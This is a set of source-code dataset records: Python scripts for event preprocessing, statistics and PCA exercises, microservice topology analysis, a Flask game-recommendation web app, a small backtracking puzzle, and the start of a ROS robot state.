= pd.Series(pd.Categorical.from_codes(codes=res['type'].values, dtype=dt_type))\n\n #if not silent:\n print('Processed {} % of events'.format(100 * proc / line_num))\n\n return res\n\ndef run_prep(file_path, prep_storage_dir):\n # file_path = './data/yyyy-mm-dd.idea'\n # where to store\n\n df = preprocess(file_path)\n\n path_str_list = os.path.split(file_path)\n file_name, suffix = path_str_list[1].split('.')\n\n file_path = prep_storage_dir + '/' + file_name\n df.to_pickle(file_path + '.pcl')\n\n return df\n\n\nif __name__ == '__main__':\n\n src = sys.argv[1]\n dst = sys.argv[2]\n if dst == '':\n dst = './data'\n\n working_dir = os.fsencode(src)\n\n for file in os.listdir(working_dir):\n file_name = os.fsdecode(file)\n\n if file_name.endswith(\".gz\") or file_name.endswith(\".idea\"):\n file_path = os.path.join(os.fsdecode(working_dir), file_name)\n res = run_prep(file_path, dst)\n else:\n continue\n","repo_name":"CESNET/SECT","sub_path":"preprocess.py","file_name":"preprocess.py","file_ext":"py","file_size_in_byte":5580,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"42778560713","text":"from typing import List, Dict, Callable\nfrom collections import Counter\nimport math\nimport matplotlib.pyplot as plt\n\ndef bucketize(point: float, bucket_size: float) -> float:\n\treturn bucket_size * math.floor(point / bucket_size)\n\ndef make_histogram(points: List[float], bucket_size: float) -> Dict[float, int]:\n\treturn Counter(bucketize(point, bucket_size) for point in points)\n\ndef plot_histogram(points: List[float], bucket_size: float, title: str = ''):\n\thistogram = make_histogram(points, bucket_size)\n\tplt.bar(list(histogram.keys()), list(histogram.values()), width = bucket_size)\n\tplt.title(title)\n\tplt.show()\n\nimport random\n\ndef normal_cdf(x: float, mu: float = 0, sigma: float = 1) -> float:\n\treturn (1 + math.erf((x - mu) / math.sqrt(2) / sigma)) / 2\n\ndef inverse_normal_cdf(p: float, mu: float = 0, sigma: float = 1,\n\t\t\t\t\t tolerance: float = 0.00001) -> float:\n\tif mu != 0 or sigma != 1:\n\t\treturn mu + sigma * inverse_normal_cdf(p, tolerance = tolerance)\n\tlow_z = -10\n\thi_z = 10\n\twhile hi_z - low_z > tolerance:\n\t\tmid_z = (low_z + hi_z) / 2\n\t\tmid_p = normal_cdf(mid_z)\n\t\tif mid_p < p:\n\t\t\tlow_z = mid_z\n\t\telse:\n\t\t\thi_z = mid_z\n\treturn mid_z\n\nrandom.seed(0)\n\nuniform = [200 * random.random() - 100 for _ in range(10000)]\nnormal = [57 * inverse_normal_cdf(random.random()) for _ in range(10000)]\n\nplot_histogram(uniform, 10, 'Равномерная гистограмма')\nplot_histogram(normal, 10, 'Гистограмма нормального распределения')\n\ndef random_normal():\n\treturn inverse_normal_cdf(random.random())\n\nxs = [random_normal() for _ in range(1000)]\nys1 = [x + random_normal() / 2 for x in xs]\nys2 = [-x + random_normal() / 2 for x in xs]\n\nplt.scatter(xs, ys1, marker = '.', color = 'black', label = 'ys1')\nplt.scatter(xs, ys2, marker = '.', color = 'gray', label = 'ys2')\nplt.xlabel('xs')\nplt.ylabel('ys')\nplt.legend(loc = 9)\nplt.title('Совсем разные совместные распределения')\nplt.show()\n\ndef de_mean(xs: List[float]) -> List[float]:\n\tx_bar = mean(xs)\n\treturn [x - x_bar for x in xs]\n\ndef variance(xs: List[float]) -> float:\n\tassert len(xs) >= 2, 'Дисперсия требует наличия не менее двух элементов'\n\tn = len(xs)\n\tdeviations = de_mean(xs)\n\tsum_of_squares = sum([d ** 2 for d in deviations])\n\treturn sum_of_squares / (n - 1)\n\ndef standard_deviation(xs: List[float]) -> float:\n\treturn math.sqrt(variance(xs))\n\ndef covariance(xs: List[float], ys: List[float]) -> float:\n\tassert len(xs) == len(ys), 'xs и ys должны иметь одинаковое число элементов'\n\tmean_xs = mean(xs)\n\tmean_ys = mean(ys)\n\tcov = sum([(x_i - mean_xs) * (y_i - mean_ys)\n\t\t\t for x_i, y_i in zip(xs, ys)]) / (len(xs) - 1)\n\treturn cov\n\ndef correlation(xs: List[float], ys: List[float]) -> float:\n\tstdev_x = standard_deviation(xs)\n\tstdev_y = standard_deviation(ys)\n\tif stdev_x > 0 and stdev_y > 0:\n\t\treturn covariance(xs, ys) / stdev_x / stdev_y\n\telse:\n\t\treturn 0\n\nVector = List[int]\nMatrix = List[List[float]]\n\ndef make_matrix(num_rows: int, num_cols: int,\n\t\t\t\tentry_fn: Callable[[int, int], float]) -> Matrix:\n\treturn [[entry_fn(i, j)\n\t\t\t for j in range(num_cols)]\n\t\t\t for i in range(num_rows)]\n\ndef correlation_matrix(data: Matrix) -> Matrix:\n\tdef correlation_ij(i: int, j: int) -> float:\n\t\treturn correlation(data[i], data[j])\n\treturn make_matrix(len(data), len(data), correlation_ij)\n\ndef random_row() -> List[float]:\n\trow = [0.0, 0, 0, 0]\n\trow[0] = random_normal()\n\trow[1] = -5 * row[0] + random_normal()\n\trow[2] = row[0] + row[1] + 5 * random_normal()\n\trow[3] = 6 if row[2] > -2 else 0\n\treturn row\n\nnum_points = 100\ncorr_rows = [random_row() for _ in range(num_points)]\ncorr_data = [list(col) for col in zip(*corr_rows)]\nnum_vectors = len(corr_data)\nfig, ax = plt.subplots(num_vectors, num_vectors)\n\nfor i in range(num_vectors):\n\tfor j in range(num_vectors):\n\t\tif i != j:\n\t\t\tax[i][j].scatter(corr_data[j], corr_data[i])\n\t\telse:\n\t\t\tax[i][j].annotate('Серия' + str(i), (0.5, 0.5),\n\t\t\t\t\t\t\t xycoords = 'axes fraction',\n\t\t\t\t\t\t\t ha = 'center', va = 'center')\n\t\tif i < num_vectors - 1:\n\t\t\tax[i][j].xaxis.set_visible(False)\n\t\tif j > 0: ax[i][j].yaxis.set_visible(False)\n\nax[-1][-1].set_xlim(ax[0][-1].get_xlim())\nax[0][0].set_ylim(ax[0][1].get_ylim())\nplt.show()\n\nimport datetime\n\nstock_price = {'closing_price': 102.06,\n 'date': datetime.date(2014, 8, 29),\n 'symbol': 'AAPL'}\n\nfrom collections import namedtuple\n\nStockPrice = namedtuple('StockPrice', ['symbol', 'date', 'closing_price'])\nprice = StockPrice('MSFT', datetime.date(2018, 12, 14), 106.03)\n\nassert price.symbol == 'MSFT'\nassert price.closing_price == 106.03\n\nfrom typing import NamedTuple\n\nclass StockPrice1(NamedTuple):\n\tsymbol: str\n\tdate: datetime.date\n\tclosing_price: float\n\n\tdef is_high_tech(self) -> bool:\n\t\treturn self.symbol in ['MSFT', 'GOOG', 'FB', 'AMZN', 'AAPL']\n\nprice1 = StockPrice1('MSFT', datetime.date(2018, 12, 14), 106.03)\n\nassert price1.symbol == 'MSFT'\nassert price1.closing_price == 106.03\nassert price1.is_high_tech()\n\nfrom dataclasses import dataclass\n\n@dataclass\nclass StockPrice2:\n\tsymbol: str\n\tdate: datetime.date\n\tclosing_price: float\n\n\tdef is_high_tech(self) -> bool:\n\t\treturn self.symbol in ['MSFT', 'GOOG', 'FB', 'AMZN', 'AAPL']\n\nprice2 = StockPrice2('MSFT', datetime.date(2018, 12, 14), 106.03)\n\nassert price2.symbol == 'MSFT'\nassert price2.closing_price == 106.03\nassert price2.is_high_tech()\n\nprice2.closing_price /= 2\nassert price2.closing_price == 53.015\n\nfrom dateutil.parser import parse\n\ndef parse_row(row: List[str]) -> StockPrice:\n\tsymbol, date, closing_price = row\n\treturn StockPrice(symbol = symbol,\n\t\t\t\t\t date = parse(date).date(),\n\t\t\t\t\t closing_price = float(closing_price))\n\nstock = parse_row(['MSFT', '2018-12-14', '106.03'])\n\nassert stock.symbol == 'MSFT'\nassert stock.date == datetime.date(2018, 12, 14)\nassert stock.closing_price == 106.03\n\nfrom typing import Optional\nimport re\n\ndef try_parse_row(row: List[str]) -> Optional[StockPrice]:\n\tsymbol, date_, closing_price_ = row\n\tif not re.match(r'^[A-Z]+$', symbol):\n\t\treturn None\n\ttry:\n\t\tdate = parse(date_).date()\n\texcept ValueError:\n\t\treturn None\n\ttry:\n\t\tclosing_price = float(closing_price_)\n\texcept ValueError:\n\t\treturn None\n\treturn StockPrice(symbol, date, closing_price)\n\nassert try_parse_row(['MSFT0', '2018-12-14', '106.03']) is None\nassert try_parse_row(['MSFT', '2018-12--14', '106.03']) is None\nassert try_parse_row(['MSFT', '2018-12-14', 'x']) is None\nassert try_parse_row(['MSFT', '2018-12-14', '106.03']) == stock\n\ndef subtract(v: Vector, w: Vector) -> Vector:\n\tassert len(v) == len(w), 'Векторы должны иметь одинаковую длину'\n\treturn [v_i - w_i for v_i, w_i in zip(v, w)]\n\ndef dot(v: Vector, w: Vector) -> float:\n\tassert len(v) == len(w)\n\treturn sum(v_i * w_i for v_i, w_i in zip(v, w))\n\ndef sum_of_squares(v: Vector) -> float:\n\treturn dot(v, v)\n\ndef squared_distance(v: Vector, w: Vector) -> float:\n\treturn sum_of_squares(subtract(v, w))\n\ndef distance(v: Vector, w: Vector) -> float:\n\treturn math.sqrt(squared_distance(v, w))\n\na_to_b = distance([63, 150], [67, 160])\na_to_c = distance([63, 150], [70, 171])\nb_to_c = distance([67, 160], [70, 171])\nprint(a_to_b, a_to_c, b_to_c)\n\na_to_b = distance([160, 150], [170.2, 160])\na_to_c = distance([160, 150], [177.8, 171])\nb_to_c = distance([170.2, 160], [177.8, 171])\nprint(a_to_b, a_to_c, b_to_c)\n\nfrom typing import Tuple\n\ndef scalar_multiply(c: float, v: Vector) -> Vector:\n\treturn [c * v_i for v_i in v]\n\ndef vector_sum(vectors: List[Vector]) -> Vector:\n\tassert vectors, 'Векторы не предоставлены!'\n\tnum_elements = len(vectors[0])\n\tassert all(len(v) == num_elements for v in vectors), 'Разные размеры!'\n\treturn [sum(vector[i] for vector in vectors)\n\t\t\tfor i in range(num_elements)]\n\ndef vector_mean(vectors: List[Vector]) -> Vector:\n\tn = len(vectors)\n\treturn scalar_multiply(1 / n, vector_sum(vectors))\n\ndef mean(xs: List[float]) -> float:\n\treturn sum(xs) / len(xs)\n\ndef de_mean(xs: List[float]) -> List[float]:\n\tx_bar = mean(xs)\n\treturn [x - x_bar for x in xs]\n\ndef variance(xs: List[float]) -> float:\n\tassert len(xs) >= 2, 'Дисперсия требует наличия не менее двух элементов'\n\tn = len(xs)\n\tdeviations = de_mean(xs)\n\tsum_of_squares = sum([d ** 2 for d in deviations])\n\treturn sum_of_squares / (n - 1)\n\ndef standard_deviation(xs: List[float]) -> float:\n\treturn math.sqrt(variance(xs))\n\ndef magnitude(v: Vector) -> float:\n\treturn math.sqrt(sum_of_squares(v))\n\ndef scale(data: List[Vector]) -> Tuple[Vector, Vector]:\n\tdim = len(data[0])\n\tmeans = vector_mean(data)\n\tstdevs = [standard_deviation([vector[i] for vector in data])\n\t\t\t for i in range(dim)]\n\treturn means, stdevs\n\nvectors = [[-3, -1, 1], [-1, 0, 1], [1, 1, 1]]\nmeans, stdevs = scale(vectors)\nassert means == [-1, 0, 1]\nassert stdevs == [2, 1, 0]\n\ndef rescale(data: List[Vector]) -> List[Vector]:\n\tdim = len(data[0])\n\tmeans, stdevs = scale(data)\n\trescaled = [v[:] for v in data]\n\tfor v in rescaled:\n\t\tfor i in range(dim):\n\t\t\tif stdevs[i] > 0:\n\t\t\t\tv[i] = (v[i] - means[i]) / stdevs[i]\n\treturn rescaled\n\nmeans, stdevs = scale(rescale(vectors))\nassert means == [0, 0, 1]\nassert stdevs == [1, 1, 0]\n\nimport tqdm\n\nfor i in tqdm.tqdm(range(100)):\n\t_ = [random.random() for _ in range(100000)]\n\ndef primes_up_to(n: int) -> List[int]:\n\tprimes = [2]\n\twith tqdm.trange(3, n) as t:\n\t\tfor i in t:\n\t\t\ti_is_prime = not any(i % p == 0 for p in primes)\n\t\t\tif i_is_prime:\n\t\t\t\tprimes.append(i)\n\t\t\tt.set_description(f'{len(primes)} простых')\n\treturn primes\n\nmy_primes = primes_up_to(100)\n\ndef de_mean(data: List[Vector]) -> List[Vector]:\n\tmean = vector_mean(data)\n\treturn [subtract(vector, mean) for vector in data]\n\ndef direction(w: Vector) -> Vector:\n\tmag = magnitude(w)\n\treturn [w_i / mag for w_i in w]\n\ndef directional_varience(data: List[Vector], w: Vector) -> float:\n\tw_dir = direction(w)\n\treturn sum(dot(v, w_dir) ** 2 for v in data)\n\ndef directional_varience_gradient(data: List[Vector], w: Vector) -> Vector:\n\tw_dir = direction(w)\n\treturn [sum(2 * dot(v, w_dir) * v[i] for v in data)\n\t\t\tfor i in range(len(w))]\n\ndef add(v: Vector, w: Vector) -> Vector:\n\tassert len(v) == len(w), 'Векторы должны иметь одинаковую длину'\n\treturn [v_i + w_i for v_i, w_i in zip(v, w)]\n\ndef gradient_step(v: Vector, gradient: Vector, step_size: float) -> Vector:\n\tassert len(v) == len(gradient)\n\tstep = scalar_multiply(step_size, gradient)\n\treturn add(v, step)\n\ndef first_principal_component(data: List[Vector],\n\t\t\t\t\t\t\t n: int = 100,\n\t\t\t\t\t\t\t step_size: float = 0.1) -> Vector:\n\tguess = [1.0 for _ in data[0]]\n\twith tqdm.trange(n) as t:\n\t\tfor _ in t:\n\t\t\tdv = directional_varience(data, guess)\n\t\t\tgradient = directional_varience_gradient(data, guess)\n\t\t\tguess = gradient_step(guess, gradient, step_size)\n\t\t\tt.set_description(f'dv: {dv:.3f}')\n\treturn direction(guess)\n\ndef project(v: Vector, w: Vector) -> Vector:\n\tprojection_length = dot(v, w)\n\treturn scalar_multiply(projection_length, w)\n\ndef remove_projection_from_vector(v: Vector, w: Vector) -> Vector:\n\treturn subtract(v, project(v, w))\n\ndef remove_projection(data: List[Vector], w: Vector) -> List[Vector]:\n\treturn [remove_projection_from_vector(v, w) for v in data]\n\ndef pca(data: List[Vector], num_components: int) -> List[Vector]:\n\tcomponents: List[Vector] = []\n\tfor _ in range(num_components):\n\t\tcomponent = first_principal_component(data)\n\t\tcomponents.append(component)\n\t\tdata = remove_projection(data, component)\n\treturn components\n\ndef transform_vector(v: Vector, components: List[Vector]) -> Vector:\n\treturn [dot(v, w) for w in components]\n\ndef transform(data: List[Vector], components: List[Vector]) -> List[Vector]:\n\treturn [transform_vector(v, components) for v in data]\n","repo_name":"MikhailSukhanov/DS_projects","sub_path":"DS_topics_Python_implementation/Working_with_data.py","file_name":"Working_with_data.py","file_ext":"py","file_size_in_byte":11797,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"21904085398","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nimport pandas as pd\nimport networkx as nx\nimport matplotlib.pyplot as plt\nimport matplotlib.cm as cm\nfrom collections import defaultdict\nimport numpy as np\n# import numpy as np\n\nclass Topology():\n def __init__(self, name='Topological analysis', loc_err=False):\n self.topology = nx.DiGraph()\n self.name = name\n self.loc_err = loc_err\n\n def load_csv(self, csv_path):\n self.df = pd.read_csv(csv_path, index_col=0)\n\n def set_topology(self, topo):\n self.topology = topo\n\n # set edge color based on num invo weight\n def set_edge_colors(self):\n def normalize(x, max_invo, min_invo):\n max_range = 1.0\n min_range = 0.2\n return (max_range - min_range) * (x - min_invo) / (max_invo - min_invo) + min_range\n\n invos_dict = nx.get_edge_attributes(self.topology, 'num_invo')\n invos = list(invos_dict.values())\n max_invo = max(invos)\n min_invo = min(invos)\n return list(map(lambda x: cm.Blues(normalize(x, max_invo, min_invo)), invos))\n\n def set_node_colors_and_label(self, reg_node_color):\n node_color = []\n node_label_dict = {}\n for node in self.topology.nodes(data=True):\n if 'rank' in node[1]:\n node_color.append(cm.YlOrRd(float(node[1]['rank']/8)))\n else: \n node_color.append(reg_node_color)\n node_label_dict[node[0]] = node[1]['label']\n\n return node_color, node_label_dict\n\n def generate_topology(self, df: pd.DataFrame, row_labels: set, exclude=False, exclude_label='node', loc_err_conf={}):\n self.df = df\n self.exclude = exclude\n self.exclude_label = exclude_label\n self.row_labels = row_labels\n edge_attr_dict = defaultdict(dict)\n node_attr_dict = defaultdict(dict)\n\n # Check if predict column exists on the dataframe\n if self.loc_err and 'predict' not in self.df.columns:\n self.loc_err = False\n\n if self.loc_err and not loc_err_conf:\n raise Exception(\"Must provide loc_err_conf for Topology instance with loc_err enabled\")\n \n for _, row in self.df.iterrows():\n # filter out some nodes\n if not self.exclude:\n if (self.exclude_label in row[self.row_labels[0]] or self.exclude_label in row[self.row_labels[1]]):\n continue\n # generate DAG\n self.topology.add_edge(row[self.row_labels[0]], row[self.row_labels[1]])\n # edge attribute: number of invocation for the edge\n if 'num_invo' not in edge_attr_dict[(row[self.row_labels[0]], row[self.row_labels[1]])]:\n edge_attr_dict[(row[self.row_labels[0]], row[self.row_labels[1]])]['num_invo'] = 0\n edge_attr_dict[(row[self.row_labels[0]], row[self.row_labels[1]])]['num_invo'] += 1\n if self.loc_err and row['predict']:\n # edge attribute: boolean to indicate if the invocation was detected as anomalous\n edge_attr_dict[(row[self.row_labels[0]], row[self.row_labels[1]])]['anomalous'] = True\n\n\n if 'selected_features' in loc_err_conf:\n for k, v in loc_err_conf['selected_features'].items():\n edge_attr_dict = dict(edge_attr_dict)\n # edge attribute: features that were selected for anomaly detection of the edge\n edge_attr_dict[k]['selected_features'] = v\n nx.set_edge_attributes(self.topology, edge_attr_dict)\n\n # Set node fact\n for node in self.topology.nodes():\n node_attr_dict[node]['label'] = node\n\n if 'root_cause' in loc_err_conf:\n for rc in loc_err_conf['root_cause']:\n node_attr_dict[rc]['label'] += '*(RC)*'\n if 'predictions' in loc_err_conf:\n for rank, prediction in enumerate(loc_err_conf['predictions'], 1):\n node_attr_dict[prediction]['rank'] = rank\n node_attr_dict[prediction]['label'] += f'~[{rank}]'\n\n nx.set_node_attributes(self.topology, node_attr_dict)\n\n def pagerank(self):\n self.reversed_topology = self.topology.reverse(copy=True)\n pr = nx.pagerank(self.reversed_topology) \n self.pr = {k: v for k, v in sorted(pr.items(), key=lambda item: item[1], reverse=True)}\n return self.pr\n\n def get_io_egdes(self):\n def format_node(node):\n in_edges = list(self.topology.in_edges(node, data=True))\n out_edges = list(self.topology.out_edges(node, data=True))\n num_in = len(in_edges)\n num_out = len(out_edges)\n\n invo_in = []\n anomalies_in = 0\n for in_e in in_edges:\n invo_in.append(in_e[2]['num_invo'] )\n if 'anomalous' in in_e[2]:\n anomalies_in += 1\n\n invo_out = [] \n anomalies_out = 0\n for out_e in out_edges:\n invo_out.append(out_e[2]['num_invo']) \n if 'anomalous' in out_e[2]:\n anomalies_out += 1\n\n in_avg, in_var = calc_avg_and_var(invo_in)\n out_avg, out_var = calc_avg_and_var(invo_out)\n return_dict = {\n 'in_edges': in_edges,\n 'out_edges': out_edges,\n 'num_in': num_in,\n 'num_out': num_out,\n 'num_out-in': num_out - num_in,\n 'num_invo-in': sum(invo_in),\n 'num_invo-out': sum(invo_out),\n 'num_invo-in-avg': in_avg,\n 'num_invo-out-avg': out_avg,\n 'num_invo-in-var': in_var,\n 'num_invo-out-var': out_var,\n } \n\n if self.loc_err:\n return_dict['num_anomalous_in'] = anomalies_in\n return_dict['num_anomalous_out'] = anomalies_out\n\n return return_dict\n\n def calc_avg_and_var(invo_list):\n if len(invo_list) > 1:\n return np.mean(np.asarray(invo_list)), np.var(np.asarray(invo_list))\n return 'n/a', 'n/a'\n\n \n self.nodes_desc = dict(map(lambda k: (k, format_node(k)), self.topology.nodes()))\n\n\n def rank_nodes(self, order: str):\n self.get_io_egdes()\n if order == 'out':\n return {k: v for k, v in sorted(self.nodes_desc.items(), key=lambda x: x[1]['num_out'], reverse=True)}\n\n elif order == 'in':\n return {k: v for k, v in sorted(self.nodes_desc.items(), key=lambda x: x[1]['num_in'], reverse=True)}\n\n elif order == 'diff':\n return {k: v for k, v in sorted(self.nodes_desc.items(), key=lambda x: x[1]['num_out-in'], reverse=True)}\n\n elif order == 'invo-in':\n return {k: v for k, v in sorted(self.nodes_desc.items(), key=lambda x: x[1]['num_invo-in'], reverse=True)}\n\n elif order == 'invo-out':\n return {k: v for k, v in sorted(self.nodes_desc.items(), key=lambda x: x[1]['num_invo-out'], reverse=True)}\n\n else:\n raise Exception(\"order must be either 'in', 'out', or 'diff'\")\n\n # TODO \n # node and edge coloring using cm\n # default configs\n def draw(self, show, path='', edge_label=False, plot_opt={}):\n plot_opt_default = {\n 'node_color': (0.57,0.71,0.41,0.75),\n 'node_lable':{},\n 'edge_color': 'gray',\n }\n if 'ax' not in plot_opt:\n def_fig = plt.figure(figsize=[16,9],dpi=120)\n def_ax = def_fig.add_axes([0,0,1,1])\n def_ax.set_title(self.name)\n plot_opt_default['ax'] = def_ax\n\n plot_opt = plot_opt_default | plot_opt\n\n if self.loc_err:\n plot_opt['edge_color'] = self.set_edge_colors()\n\n plot_opt['node_color'], plot_opt['node_label'] = self.set_node_colors_and_label(plot_opt['node_color'])\n\n anomalous_edges = nx.get_edge_attributes(self.topology, 'anomalous')\n anomalous_edges = list(anomalous_edges.keys()) \n nx.draw_networkx_edges(self.topology, pos=nx.nx_pydot.graphviz_layout(self.topology, prog='dot'), edgelist=anomalous_edges, style='solid', ax=plot_opt['ax'], width=3, arrowsize=1, edge_color='red')\n\n el = nx.get_edge_attributes(self.topology, 'selected_features')\n for k, v in el.items():\n plot_opt['ax'].plot([], [], 'r_', label=f'{k}: {\", \".join(v)}')\n\n nx.draw_networkx(self.topology, pos=nx.nx_pydot.graphviz_layout(self.topology, prog='dot'), ax=plot_opt['ax'], node_size=300, font_size=7, font_color='#373737', width=2, arrowsize=10, edge_color=plot_opt['edge_color'], node_color=plot_opt['node_color'], labels=plot_opt['node_label'])\n\n if edge_label:\n el = nx.get_edge_attributes(self.topology, 'num_invo')\n bbox = dict(boxstyle='round', ec=(0.0, 1.0, 1.0, 0), fc=(0.0, 1.0, 1.0, 0))\n nx.draw_networkx_edge_labels(self.topology, pos=nx.nx_pydot.graphviz_layout(self.topology, prog='dot'), ax=plot_opt['ax'], edge_labels = el, font_size=8, verticalalignment='bottom', label_pos= 0.5, rotate=True, bbox=bbox)\n\n plot_opt['ax'].legend()\n\n if show:\n plt.show()\n if path:\n plt.savefig(path)\n plt.close()\n\n","repo_name":"hanapedia/rca_implemented","sub_path":"topological_analysis/topological_analysis.py","file_name":"topological_analysis.py","file_ext":"py","file_size_in_byte":9285,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"27158260642","text":"import os\nimport random\nimport string\nfrom PIL import Image\nfrom flask import render_template, url_for, flash, redirect, request, abort\nfrom psrPlatform import app, db, bcrypt\nfrom psrPlatform.forms import RegistrationForm, LoginForm, RateForm, PicForm\nfrom psrPlatform.models import Users, Products, Ratings\nfrom psrPlatform import SVDpp_val, user_knn, user_pool\nfrom psrPlatform import get_similar_users, get_top_N_recommended_items\nfrom flask_login import login_user, current_user, logout_user, login_required\nfrom werkzeug.utils import secure_filename\nimport pickle\nimport numpy as np\nimport tensorflow as tf\nfrom keras.preprocessing import image\nfrom keras.models import load_model\nfrom keras.backend import clear_session, set_session\nfrom datetime import timedelta\n\n## load the deep learning model\nlabel2idx = pickle.load(open('./psrPlatform/img_model/img_label2idx.pkl', 'rb'))\nidx2label = {i:j for j, i in label2idx.items()}\nsess = tf.Session()\ngraph = tf.get_default_graph()\nset_session(sess)\nmodel = load_model(\"./psrPlatform/img_model/model_47000img_identification.h5\") \n\ndef gen_reviewerID(stringLength=14):\n lettersAndDigits = string.ascii_letters + string.digits\n return ''.join((random.choice(lettersAndDigits) for i in range(stringLength))).upper() \n\n# default page\n@app.route(\"/\")\n@app.route(\"/default\")\ndef default():\n return render_template('default.html')\n\n# home page\n@app.route(\"/home\")\n@login_required\ndef home():\n user = Users.query.filter_by(reviewerName=current_user.reviewerName).first_or_404()\n return render_template('home.html', username=user.reviewerName)\n\n\n@app.route(\"/games_by_p/\")\n@login_required\ndef games_by_p(price_choose):\n page = request.args.get('page', 1, type=int)\n price_choose_int = int(price_choose)\n games = Products.query.filter(Products.price < price_choose_int).paginate(page=page, per_page=5)\n return render_template('games_list.html', games=games, price_choose=price_choose)\n\n@app.route(\"/games_by_pic \", methods=['GET', 'POST'])\n@login_required\ndef games_by_pic():\n form = PicForm()\n if form.validate_on_submit():\n games_pre = pre_picture(form.picture.data)\n games_found = [Products.query.filter_by(asin = i).first() for i in games_pre]\n games_found = [i for i in games_found if i is not None]\n if games_found:\n return render_template('games_list_pic.html', games = games_found)\n else: \n flash('Whoops. Unable to find the image due to no record in database. Try another one.', 'danger')\n return render_template('search_by_pic.html', form=form, legend='Search by Picture')\n\n@app.route(\"/recommended_games\")\n@login_required\ndef recommended_games():\n user = Users.query.filter_by(reviewerName=current_user.reviewerName).first_or_404()\n userId = Users.query.filter_by(reviewerName=current_user.reviewerName).first().reviewerID\n print(userId)\n if userId not in user_pool:\n userId = random.sample(user_pool, 1)[0]\n recom_games = get_top_N_recommended_items(userId)\n games_found = [Products.query.filter_by(asin = i).first() for i in recom_games]\n games_found = [i for i in games_found if i is not None]\n if games_found :\n return render_template('recommended_games.html', games = games_found)\n else:\n flash('Unable to recommend. Rate more games would help the system learn!', 'danger')\n return render_template('home.html', username=user.reviewerName)\n\n\n\n@app.route(\"/games/\")\n@login_required\ndef game_detail(game_id):\n game = Products.query.filter_by(asin = game_id).first_or_404()\n page = request.args.get('page', 1, type=int)\n rates = Ratings.query.filter_by(asin = game_id).order_by(Ratings.reviewTime.desc())\\\n .paginate(page=page, per_page=5)\n return render_template('game_detail.html', game = game, rates = rates)\n\n@app.route(\"/rate/new\", methods=['GET', 'POST'])\n@login_required\ndef create_post():\n form = RateForm()\n if form.validate_on_submit():\n game = Products.query.filter_by(asin = form.game_id.data).first()\n #print(game.asin)\n rate = Ratings(product=game,\n reviewerName = current_user.reviewerName,\n reviewText=form.comment.data,\n summary = form.summary.data,\n rating = int(form.score.data),\n author=current_user)\n db.session.add(rate)\n db.session.commit()\n flash('Your rate has been submitted!', 'success')\n return redirect(url_for('home'))\n return render_template('create_post.html', title='New Rate',\n form=form, legend='New Rate')\n\n@app.route(\"/user_rates\")\n@login_required\ndef user_rates():\n page = request.args.get('page', 1, type=int)\n rates = Ratings.query.filter_by(author=current_user)\\\n .order_by(Ratings.reviewTime.desc())\\\n .paginate(page=page, per_page=5)\n username=current_user.reviewerName\n return render_template('user_rates.html', rates=rates, username=username)\n\n\n@app.route(\"/register\", methods=['GET', 'POST'])\ndef register():\n if current_user.is_authenticated:\n return redirect(url_for('home'))\n form = RegistrationForm()\n if form.validate_on_submit():\n hashed_password = bcrypt.generate_password_hash(form.password.data).decode('utf-8')\n while True:\n new_reviewerID = gen_reviewerID()\n if not Users.query.get(new_reviewerID):\n break\n user = Users(reviewerID = new_reviewerID, reviewerName=form.username.data, reviewerPW=hashed_password)\n db.session.add(user)\n db.session.commit()\n flash('Your account has been created! You are now able to log in', 'success')\n return redirect(url_for('login'))\n return render_template('register.html', title='Register', form=form)\n\n\n@app.route(\"/login\", methods=['GET', 'POST'])\ndef login():\n if current_user.is_authenticated:\n return redirect(url_for('home'))\n form = LoginForm()\n if form.validate_on_submit():\n user = Users.query.filter_by(reviewerName=form.username.data).first()\n if user and bcrypt.check_password_hash(user.reviewerPW, form.password.data):\n login_user(user,duration = timedelta(minutes=5))\n next_page = request.args.get('next')\n return redirect(next_page) if next_page else redirect(url_for('home'))\n else:\n flash('Login Unsuccessful. Please check account and password', 'danger')\n return render_template('login.html', title='Login', form=form)\n\n\n@app.route(\"/logout\")\ndef logout():\n logout_user()\n return redirect(url_for('default'))\n\n\ndef save_picture(form_picture):\n picture_path = os.path.join(app.root_path, 'static/profile_pics', form_picture.filename)\n output_size = (150, 150)\n i = Image.open(form_picture)\n i.thumbnail(output_size)\n i.save(picture_path)\n\n return picture_path\n\n\ndef pre_picture(form_picture):\n img = Image.open(form_picture)\n img = img.resize((150, 150))\n x = np.expand_dims(image.img_to_array(img), axis=0)/255.0\n #print(x.shape)\n #print(model.summary())\n global sess\n global graph\n with graph.as_default():\n set_session(sess)\n pred = model.predict(x)\n #clear_session()\n # get top 3 product id with confidence\n pred = pred.flatten()\n top_3_idx = pred.argsort()[::-1][:3]\n top_3_items = {idx2label[i]:np.round(pred[i],10) for i in top_3_idx}\n print(top_3_items)\n top_3_list = sorted(top_3_items.keys(), key=lambda x: top_3_items[x], reverse = True) \n return top_3_list\n\n\n","repo_name":"aaron-DJUN/cloud_computing_proj","sub_path":"PSR_SaaS/psrPlatform/routes.py","file_name":"routes.py","file_ext":"py","file_size_in_byte":7641,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"38968896815","text":"# https://chaemi720.tistory.com/172\n\nfrom sys import stdin\n\nN, M = map(int, stdin.readline().split())\n\n# 수열, 수열에 들어간 요소 표시\ndef check(arr,visited):\n # 수열의 길이가 M인가?\n if len(arr) == M:\n print(*arr)\n return\n\n for i in range(1,N+1):\n # 수열에 없다면\n if visited[i] == 0:\n # 수열에 넣기\n visited[i] = 1\n check(arr+[i],visited)\n # 초기화\n visited[i] = 0\n\ncheck([],[0]*(N+1))\n ","repo_name":"chaemj97/Algorithm","sub_path":"2022년/6월/0618_백준_15649_N과M(1).py","file_name":"0618_백준_15649_N과M(1).py","file_ext":"py","file_size_in_byte":518,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"37771561681","text":"from geometry_msgs.msg import Pose, PoseStamped, Point, Quaternion\nfrom pr2_pick_main import handle_service_exceptions\nfrom std_msgs.msg import Header\nfrom pr2_pick_manipulation.srv import MoveArmIk, MoveArmIkRequest\nfrom visualization_msgs.msg import Marker\nimport moveit_commander\nimport outcomes\nimport rospy\nimport smach\nimport tf\nimport visualization as viz\nimport time\n\nclass DropOffItem(smach.State): \n 